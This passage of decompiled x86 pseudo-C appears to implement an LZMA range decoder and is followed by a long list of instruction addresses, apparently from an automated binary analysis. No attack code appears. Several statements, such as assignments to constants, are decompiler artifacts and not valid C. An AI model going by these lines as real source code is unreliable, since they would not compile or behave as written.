											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                          0x00407194
                                          0x00407194
                                          0x00407194
                                          0x00407194
                                          0x0040719a
                                          0x0040719e
                                          0x004071a2
                                          0x004071ac
                                          0x004071ba
                                          0x00407490
                                          0x00407490
                                          0x00407493
                                          0x0040749a
                                          0x004074c7
                                          0x004074c7
                                          0x004074cb
                                          0x00000000
                                          0x00000000
                                          0x004074cd
                                          0x004074d6
                                          0x004074dc
                                          0x004074df
                                          0x004074e2
                                          0x004074e5
                                          0x004074e8
                                          0x004074ee
                                          0x00407507
                                          0x0040750a
                                          0x00407516
                                          0x00407517
                                          0x0040751a
                                          0x004074f0
                                          0x004074f0
                                          0x004074ff
                                          0x00407502
                                          0x00407502
                                          0x00407524
                                          0x004074c4
                                          0x004074c4
                                          0x004074c4
                                          0x004074c7
                                          0x004074cb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00407526
                                          0x00407526
                                          0x0040749f
                                          0x004074a3
                                          0x004075db
                                          0x004075db
                                          0x004075e5
                                          0x004075ed
                                          0x004075f4
                                          0x004075f6
                                          0x004075fd
                                          0x00407601
                                          0x00407601
                                          0x004074a9
                                          0x004074af
                                          0x004074b6
                                          0x004074be
                                          0x004074be
                                          0x004074c1
                                          0x00000000
                                          0x004074c1
                                          0x0040752b
                                          0x00407538
                                          0x0040753b
                                          0x00407447
                                          0x00407447
                                          0x00407447
                                          0x00406be3
                                          0x00406be3
                                          0x00406be3
                                          0x00406bec
                                          0x00000000
                                          0x00000000
                                          0x00406bf2
                                          0x00406bf2
                                          0x00000000
                                          0x00406bf9
                                          0x00406bfd
                                          0x00000000
                                          0x00000000
                                          0x00406c03
                                          0x00406c06
                                          0x00406c09
                                          0x00406c0c
                                          0x00406c10
                                          0x00000000
                                          0x00000000
                                          0x00406c16
                                          0x00406c16
                                          0x00406c19
                                          0x00406c1b
                                          0x00406c1c
                                          0x00406c1f
                                          0x00406c21
                                          0x00406c22
                                          0x00406c24
                                          0x00406c27
                                          0x00406c2c
                                          0x00406c31
                                          0x00406c3a
                                          0x00406c4d
                                          0x00406c50
                                          0x00406c5c
                                          0x00406c84
                                          0x00406c86
                                          0x00406c94
                                          0x00406c94
                                          0x00406c98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406c88
                                          0x00406c88
                                          0x00406c8b
                                          0x00406c8c
                                          0x00406c8c
                                          0x00000000
                                          0x00406c88
                                          0x00406c5e
                                          0x00406c62
                                          0x00406c67
                                          0x00406c67
                                          0x00406c70
                                          0x00406c78
                                          0x00406c7b
                                          0x00000000
                                          0x00406c81
                                          0x00406c81
                                          0x00000000
                                          0x00406c81
                                          0x00000000
                                          0x00406c9e
                                          0x00406c9e
                                          0x00406ca2
                                          0x0040754e
                                          0x0040754e
                                          0x00000000
                                          0x0040754e
                                          0x00406ca8
                                          0x00406cab
                                          0x00406cbb
                                          0x00406cbe
                                          0x00406cc1
                                          0x00406cc1
                                          0x00406cc1
                                          0x00406cc4
                                          0x00406cc8
                                          0x00000000
                                          0x00000000
                                          0x00406cca
                                          0x00406cca
                                          0x00406cd0
                                          0x00406cfa
                                          0x00406d00
                                          0x00406d07
                                          0x00000000
                                          0x00406d07
                                          0x00406cd2
                                          0x00406cd6
                                          0x00406cd9
                                          0x00406cde
                                          0x00406cde
                                          0x00406ce9
                                          0x00406cf1
                                          0x00406cf4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406d39
                                          0x00406d3f
                                          0x00406d42
                                          0x00406d4f
                                          0x00406d57
                                          0x00000000
                                          0x00000000
                                          0x00406d0e
                                          0x00406d0e
                                          0x00406d12
                                          0x0040755d
                                          0x0040755d
                                          0x00000000
                                          0x0040755d
                                          0x00406d18
                                          0x00406d1e
                                          0x00406d29
                                          0x00406d29
                                          0x00406d29
                                          0x00406d2c
                                          0x00406d2f
                                          0x00406d32
                                          0x00406d37
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004073ce
                                          0x004073ce
                                          0x004073d4
                                          0x004073da
                                          0x004073e0
                                          0x004073fa
                                          0x004073fd
                                          0x00407403
                                          0x0040740e
                                          0x0040740e
                                          0x00407410
                                          0x004073e2
                                          0x004073e2
                                          0x004073f1
                                          0x004073f5
                                          0x004073f5
                                          0x0040741a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040741c
                                          0x00407420
                                          0x004075cf
                                          0x004075cf
                                          0x00000000
                                          0x004075cf
                                          0x00407426
                                          0x0040742c
                                          0x00407433
                                          0x0040743b
                                          0x0040743e
                                          0x00407441
                                          0x00407441
                                          0x00407447
                                          0x00407447
                                          0x00000000
                                          0x00000000
                                          0x00406d5f
                                          0x00406d5f
                                          0x00406d61
                                          0x00406d64
                                          0x00406dd5
                                          0x00406dd5
                                          0x00406dd8
                                          0x00406ddb
                                          0x00406de2
                                          0x00406dec
                                          0x00000000
                                          0x00406dec
                                          0x00406d66
                                          0x00406d66
                                          0x00406d6a
                                          0x00406d6d
                                          0x00406d6f
                                          0x00406d72
                                          0x00406d75
                                          0x00406d77
                                          0x00406d7a
                                          0x00406d7c
                                          0x00406d81
                                          0x00406d84
                                          0x00406d87
                                          0x00406d8b
                                          0x00406d92
                                          0x00406d95
                                          0x00406d9c
                                          0x00406da0
                                          0x00406da8
                                          0x00406da8
                                          0x00406da8
                                          0x00406da2
                                          0x00406da2
                                          0x00406da2
                                          0x00406d97
                                          0x00406d97
                                          0x00406d97
                                          0x00406dac
                                          0x00406daf
                                          0x00406dcd
                                          0x00406dcd
                                          0x00406dcf
                                          0x00000000
                                          0x00406db1
                                          0x00406db1
                                          0x00406db1
                                          0x00406db4
                                          0x00406db7
                                          0x00406dba
                                          0x00406dbc
                                          0x00406dbc
                                          0x00406dbc
                                          0x00406dbf
                                          0x00406dc2
                                          0x00406dc4
                                          0x00406dc5
                                          0x00406dc8
                                          0x00000000
                                          0x00406dc8
                                          0x00000000
                                          0x00406ffe
                                          0x00406ffe
                                          0x00407002
                                          0x00407020
                                          0x00407020
                                          0x00407023
                                          0x0040702a
                                          0x0040702d
                                          0x00407030
                                          0x00407033
                                          0x00407036
                                          0x00407039
                                          0x0040703b
                                          0x00407042
                                          0x00407043
                                          0x00407045
                                          0x00407048
                                          0x0040704b
                                          0x0040704e
                                          0x0040704e
                                          0x00407053
                                          0x00000000
                                          0x00407053
                                          0x00407004
                                          0x00407004
                                          0x00407007
                                          0x0040700a
                                          0x00407014
                                          0x00000000
                                          0x00000000
                                          0x00407068
                                          0x00407068
                                          0x0040706c
                                          0x0040708f
                                          0x00407092
                                          0x00407095
                                          0x0040709f
                                          0x0040706e
                                          0x0040706e
                                          0x00407071
                                          0x00407074
                                          0x00407077
                                          0x00407084
                                          0x00407087
                                          0x00407087
                                          0x00000000
                                          0x00000000
                                          0x004070ab
                                          0x004070ab
                                          0x004070af
                                          0x00000000
                                          0x00000000
                                          0x004070b5
                                          0x004070b5
                                          0x004070b9
                                          0x00000000
                                          0x00000000
                                          0x004070bf
                                          0x004070bf
                                          0x004070c1
                                          0x004070c5
                                          0x004070c5
                                          0x004070c8
                                          0x004070cc
                                          0x00000000
                                          0x00000000
                                          0x0040711c
                                          0x0040711c
                                          0x00407120
                                          0x00407127
                                          0x00407127
                                          0x0040712a
                                          0x0040712d
                                          0x00407137
                                          0x00000000
                                          0x00407137
                                          0x00407122
                                          0x00407122
                                          0x00000000
                                          0x00000000
                                          0x00407143
                                          0x00407143
                                          0x00407147
                                          0x0040714e
                                          0x00407151
                                          0x00407154
                                          0x00407149
                                          0x00407149
                                          0x00407149
                                          0x00407157
                                          0x0040715a
                                          0x0040715d
                                          0x0040715d
                                          0x00407160
                                          0x00407163
                                          0x00407166
                                          0x00407166
                                          0x00407169
                                          0x00407170
                                          0x00407175
                                          0x00000000
                                          0x00000000
                                          0x00407203
                                          0x00407203
                                          0x00407207
                                          0x004075a5
                                          0x004075a5
                                          0x00000000
                                          0x004075a5
                                          0x0040720d
                                          0x0040720d
                                          0x00407210
                                          0x00407213
                                          0x00407217
                                          0x0040721a
                                          0x00407220
                                          0x00407222
                                          0x00407222
                                          0x00407222
                                          0x00407225
                                          0x00407228
                                          0x00000000
                                          0x00000000
                                          0x00406df8
                                          0x00406df8
                                          0x00406dfc
                                          0x00407569
                                          0x00407569
                                          0x00000000
                                          0x00407569
                                          0x00406e02
                                          0x00406e02
                                          0x00406e05
                                          0x00406e08
                                          0x00406e0c
                                          0x00406e0f
                                          0x00406e15
                                          0x00406e17
                                          0x00406e17
                                          0x00406e17
                                          0x00406e1a
                                          0x00406e1d
                                          0x00406e1d
                                          0x00406e20
                                          0x00406e23
                                          0x00000000
                                          0x00000000
                                          0x00406e29
                                          0x00406e29
                                          0x00406e2f
                                          0x00000000
                                          0x00000000
                                          0x00406e35
                                          0x00406e35
                                          0x00406e39
                                          0x00406e3c
                                          0x00406e3f
                                          0x00406e42
                                          0x00406e45
                                          0x00406e46
                                          0x00406e49
                                          0x00406e4b
                                          0x00406e51
                                          0x00406e54
                                          0x00406e57
                                          0x00406e5a
                                          0x00406e5d
                                          0x00406e60
                                          0x00406e63
                                          0x00406e7f
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8f
                                          0x00406e93
                                          0x00406e95
                                          0x00406e99
                                          0x00406e65
                                          0x00406e65
                                          0x00406e69
                                          0x00406e71
                                          0x00406e76
                                          0x00406e78
                                          0x00406e7a
                                          0x00406e7a
                                          0x00406e9c
                                          0x00406ea3
                                          0x00406ea6
                                          0x00000000
                                          0x00406eac
                                          0x00406eac
                                          0x00000000
                                          0x00406eac
                                          0x00000000
                                          0x00406eb1
                                          0x00406eb1
                                          0x00406eb5
                                          0x00407575
                                          0x00407575
                                          0x00000000
                                          0x00407575
                                          0x00406ebb
                                          0x00406ebb
                                          0x00406ebe
                                          0x00406ec1
                                          0x00406ec5
                                          0x00406ec8
                                          0x00406ece
                                          0x00406ed0
                                          0x00406ed0
                                          0x00406ed0
                                          0x00406ed3
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406edc
                                          0x00000000
                                          0x00000000
                                          0x00406ede
                                          0x00406ede
                                          0x00406ee1
                                          0x00406ee4
                                          0x00406ee7
                                          0x00406eea
                                          0x00406eed
                                          0x00406ef0
                                          0x00406ef3
                                          0x00406ef6
                                          0x00406ef9
                                          0x00406efc
                                          0x00406f14
                                          0x00406f17
                                          0x00406f1a
                                          0x00406f1d
                                          0x00406f1d
                                          0x00406f20
                                          0x00406f24
                                          0x00406f26
                                          0x00406efe
                                          0x00406efe
                                          0x00406f06
                                          0x00406f0b
                                          0x00406f0d
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f29
                                          0x00406f30
                                          0x00406f33
                                          0x00000000
                                          0x00406f35
                                          0x00406f35
                                          0x00000000
                                          0x00406f35
                                          0x00406f33
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3a
                                          0x00000000
                                          0x00000000
                                          0x00406f75
                                          0x00406f75
                                          0x00406f79
                                          0x00407581
                                          0x00407581
                                          0x00000000
                                          0x00407581
                                          0x00406f7f
                                          0x00406f7f
                                          0x00406f82
                                          0x00406f85
                                          0x00406f89
                                          0x00406f8c
                                          0x00406f92
                                          0x00406f94
                                          0x00406f94
                                          0x00406f94
                                          0x00406f97
                                          0x00406f9a
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406f3e
                                          0x00406f3e
                                          0x00406f41
                                          0x00000000
                                          0x00406f41
                                          0x00406fa2
                                          0x00406fa2
                                          0x00406fa5
                                          0x00406fa8
                                          0x00406fab
                                          0x00406fae
                                          0x00406fb1
                                          0x00406fb4
                                          0x00406fb7
                                          0x00406fba
                                          0x00406fbd
                                          0x00406fc0
                                          0x00406fd8
                                          0x00406fdb
                                          0x00406fde
                                          0x00406fe1
                                          0x00406fe1
                                          0x00406fe4
                                          0x00406fe8
                                          0x00406fea
                                          0x00406fc2
                                          0x00406fc2
                                          0x00406fca
                                          0x00406fcf
                                          0x00406fd1
                                          0x00406fd3
                                          0x00406fd3
                                          0x00406fed
                                          0x00406ff4
                                          0x00406ff7
                                          0x00000000
                                          0x00406ff9
                                          0x00406ff9
                                          0x00000000
                                          0x00406ff9
                                          0x00000000
                                          0x00407286
                                          0x00407286
                                          0x0040728a
                                          0x004075b1
                                          0x004075b1
                                          0x00000000
                                          0x004075b1
                                          0x00407290
                                          0x00407290
                                          0x00407293
                                          0x00407296
                                          0x0040729a
                                          0x0040729d
                                          0x004072a3
                                          0x004072a5
                                          0x004072a5
                                          0x004072a5
                                          0x004072a8
                                          0x00000000
                                          0x00000000
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x00000000
                                          0x00000000
                                          0x00407395
                                          0x00407395
                                          0x00407399
                                          0x004073bb
                                          0x004073bb
                                          0x004073be
                                          0x004073c8
                                          0x004073cb
                                          0x004073cb
                                          0x00000000
                                          0x004073cb
                                          0x0040739b
                                          0x0040739b
                                          0x0040739e
                                          0x004073a2
                                          0x004073a5
                                          0x004073a5
                                          0x004073a8
                                          0x00000000
                                          0x00000000
                                          0x00407452
                                          0x00407452
                                          0x00407456
                                          0x00407474
                                          0x00407474
                                          0x00407474
                                          0x00407474
                                          0x0040747b
                                          0x00407482
                                          0x00407489
                                          0x00407489
                                          0x00407490
                                          0x00407493
                                          0x0040749a
                                          0x00000000
                                          0x0040749d
                                          0x00407458
                                          0x00407458
                                          0x0040745b
                                          0x0040745e
                                          0x00407461
                                          0x00407468
                                          0x004073ac
                                          0x004073ac
                                          0x004073af
                                          0x00000000
                                          0x00000000
                                          0x00407543
                                          0x00407543
                                          0x00407546
                                          0x00407447
                                          0x00407447
                                          0x00407447
                                          0x00000000
                                          0x0040744d
                                          0x00000000
                                          0x0040717d
                                          0x0040717d
                                          0x0040717f
                                          0x00407186
                                          0x00407187
                                          0x00407189
                                          0x0040718c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00407490
                                          0x00407490
                                          0x00407493
                                          0x0040749a
                                          0x00000000
                                          0x0040749d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004071c2
                                          0x004071c2
                                          0x004071c5
                                          0x004071fb
                                          0x004071fb
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732e
                                          0x0040732e
                                          0x00407331
                                          0x00407333
                                          0x004075bd
                                          0x004075bd
                                          0x00000000
                                          0x004075bd
                                          0x00407339
                                          0x00407339
                                          0x0040733c
                                          0x00000000
                                          0x00000000
                                          0x00407342
                                          0x00407342
                                          0x00407346
                                          0x00407349
                                          0x00407349
                                          0x00407349
                                          0x00000000
                                          0x00407349
                                          0x004071c7
                                          0x004071c7
                                          0x004071c9
                                          0x004071cb
                                          0x004071cd
                                          0x004071d0
                                          0x004071d1
                                          0x004071d3
                                          0x004071d5
                                          0x004071d8
                                          0x004071db
                                          0x004071f1
                                          0x004071f1
                                          0x004071f6
                                          0x0040722e
                                          0x0040722e
                                          0x00407232
                                          0x0040725b
                                          0x0040725e
                                          0x00407260
                                          0x00407267
                                          0x0040726a
                                          0x0040726d
                                          0x0040726d
                                          0x00407272
                                          0x00407272
                                          0x00407274
                                          0x00407277
                                          0x0040727e
                                          0x00407281
                                          0x004072ae
                                          0x004072ae
                                          0x004072b1
                                          0x004072b4
                                          0x00407328
                                          0x00407328
                                          0x00407328
                                          0x00407328
                                          0x00000000
                                          0x00407328
                                          0x004072b6
                                          0x004072b6
                                          0x004072bc
                                          0x004072bf
                                          0x004072c2
                                          0x004072c5
                                          0x004072c8
                                          0x004072cb
                                          0x004072ce
                                          0x004072d1
                                          0x004072d4
                                          0x004072d7
                                          0x004072f0
                                          0x004072f2
                                          0x004072f5
                                          0x004072f6
                                          0x004072f9
                                          0x004072fb
                                          0x004072fe
                                          0x00407300
                                          0x00407302
                                          0x00407305
                                          0x00407307
                                          0x0040730a
                                          0x0040730e
                                          0x00407310
                                          0x00407310
                                          0x00407311
                                          0x00407314
                                          0x00407317
                                          0x004072d9
                                          0x004072d9
                                          0x004072e1
                                          0x004072e6
                                          0x004072e8
                                          0x004072eb
                                          0x004072eb
                                          0x0040731a
                                          0x00407321
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x00000000
                                          0x00407323
                                          0x00407323
                                          0x00000000
                                          0x00407323
                                          0x00407321
                                          0x00407234
                                          0x00407234
                                          0x00407237
                                          0x00407239
                                          0x0040723c
                                          0x0040723f
                                          0x00407242
                                          0x00407244
                                          0x00407247
                                          0x0040724a
                                          0x0040724a
                                          0x0040724d
                                          0x0040724d
                                          0x00407250
                                          0x00407257
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x00000000
                                          0x00407259
                                          0x00407259
                                          0x00000000
                                          0x00407259
                                          0x00407257
                                          0x004071dd
                                          0x004071dd
                                          0x004071e0
                                          0x004071e2
                                          0x004071e5
                                          0x00000000
                                          0x00000000
                                          0x00406f44
                                          0x00406f44
                                          0x00406f48
                                          0x0040758d
                                          0x0040758d
                                          0x00000000
                                          0x0040758d
                                          0x00406f4e
                                          0x00406f4e
                                          0x00406f51
                                          0x00406f54
                                          0x00406f57
                                          0x00406f5a
                                          0x00406f5d
                                          0x00406f60
                                          0x00406f62
                                          0x00406f65
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6d
                                          0x00406f6d
                                          0x00406f6d
